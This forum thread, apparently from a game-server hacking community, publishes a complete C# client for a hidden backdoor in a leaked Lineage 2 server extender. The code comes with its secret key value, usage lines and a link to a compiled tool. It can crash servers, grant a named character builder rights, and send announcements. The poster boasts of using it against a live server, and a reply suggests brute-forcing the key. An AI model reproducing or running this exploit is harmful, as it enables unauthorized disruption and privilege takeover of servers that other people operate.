Jump to content

Recommended Posts

Posted

This applies specifically to THIS TOPIC.

Inside that version is a rather clever backdoor that can;

Crash the server

Set a character as builder 1 (by char name, character must be online)

Get online player count (unmultiplied)

Send announcements to the server

 

Code is in C#

    class KationBackdoor
   {
       private uint nBackdoorInt;
       public KationBackdoor(uint value)
       {
           SetInt(value);
       }
       public void SetInt(uint value)
       {
           nBackdoorInt = value;
       }
       public bool Crash(String ip, int port)
       {
           return (QueryServer(1, null, ip, port) == 1);
       }
       public bool Announce(String str, String ip, int port)
       {
           return (QueryServer(2, str, ip, port) == 1);
       }
       public bool SetBuilder(String name, String ip, int port)
       {
           return (QueryServer(3, name, ip, port) == 1);
       }
       public int GetPlayerCount(String ip, int port)
       {
           return QueryServer(4, null, ip, port);
       }
       private int QueryServer(int nQueryType, String strQuery, String strIP, int nPort)
       {
           IPEndPoint ipe = new IPEndPoint(IPAddress.Parse(strIP), nPort);
           Socket serverSock = new Socket(ipe.AddressFamily, SocketType.Stream, ProtocolType.Tcp);
           try
           {
               serverSock.Connect(ipe);
               if (serverSock.Connected)
               {
                   MemoryStream ms = new MemoryStream();
                   BinaryWriter bw = new BinaryWriter(ms);
                   bw.Write((short)0);         // holder for length
                   bw.Write((byte)0);          // protocol version opcode
                   bw.Write(nBackdoorInt);     // backdoor initializer
                   bw.Write((uint)2921549720); // unknown integer (not even needed, overwritten by server)
                   bw.Write(nQueryType);       // query type identifier
                   if (nQueryType == 2 || nQueryType == 3)
                   {
                       UnicodeEncoding enc = new UnicodeEncoding(false, false);
                       byte[] data = enc.GetBytes(strQuery);
                       bw.Write(data, 0, data.Length);
                       bw.Write((short)0);
                   }
                   bw.Seek(0, SeekOrigin.Begin);
                   bw.Write((short)ms.Length);
                   serverSock.Send(ms.GetBuffer(), (int)ms.Length, SocketFlags.None);

                   byte[] recvBuffer = new byte[256];
                   
                   serverSock.Receive(recvBuffer, recvBuffer.Length, SocketFlags.None);

                   BinaryReader br = new BinaryReader(new MemoryStream(recvBuffer));
                   short len = br.ReadInt16();
                   byte op = br.ReadByte();
                   int ret = br.ReadInt32();
                   if (op != nQueryType-1)
                       MessageBox.Show(op.ToString() + " Received, NOT QUERY TYPE!");

                   serverSock.Close();
                   return ret;
               }
               return -2;
           }
           catch
           {
               if (serverSock.Connected)
                   serverSock.Close();
               return -1;
           }
       }
   }

 

int required for the linked version is 2711833028

i haven't checked in the cracked version shared by Vanganth, or the version(s) sold by resellers.

Usage:

KationBackdoor kbd = new KationBackdoor(2711833028);
kbd.Crash("127.0.0.1", 7777);

but do note, this backdoor no longer exists in current live versions of Vanganth's extender, though i did have some fun with L2Hydra before they updated lol

 

Compiled application link -> http://maxcheaters.com/forum/index.php?topic=208959

Posted

I am pretty sure, all re-sellers will ask to delete their topics :)

 

Just great share, waiting for compiled version

 

WTS vanganth's extender with backdoor CLEARED (no backdoor) ^^

 

Posted

How many will be able to use the class to create a simple console or win32 wrap up for use ? ;)

 

And shame on you for keeping this to yourself so long! BAD ANARCHY.

Posted

How many will be able to use the class to create a simple console or win32 wrap up for use ? ;)

 

And shame on you for keeping this to yourself so long! BAD ANARCHY.

bitch if you were ever on msn i would of told you about it, but noooo you're offline 24/7 and when you are online you ignore me :(
Posted

hope,some1 could fix this backdoor....

 

 

Really?

 

Change the bloody backdoor int key token to something else and it's bruteforce trial and error...

  • Vision changed the title to Kation/Vanganth leaked version backdoor (C#)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock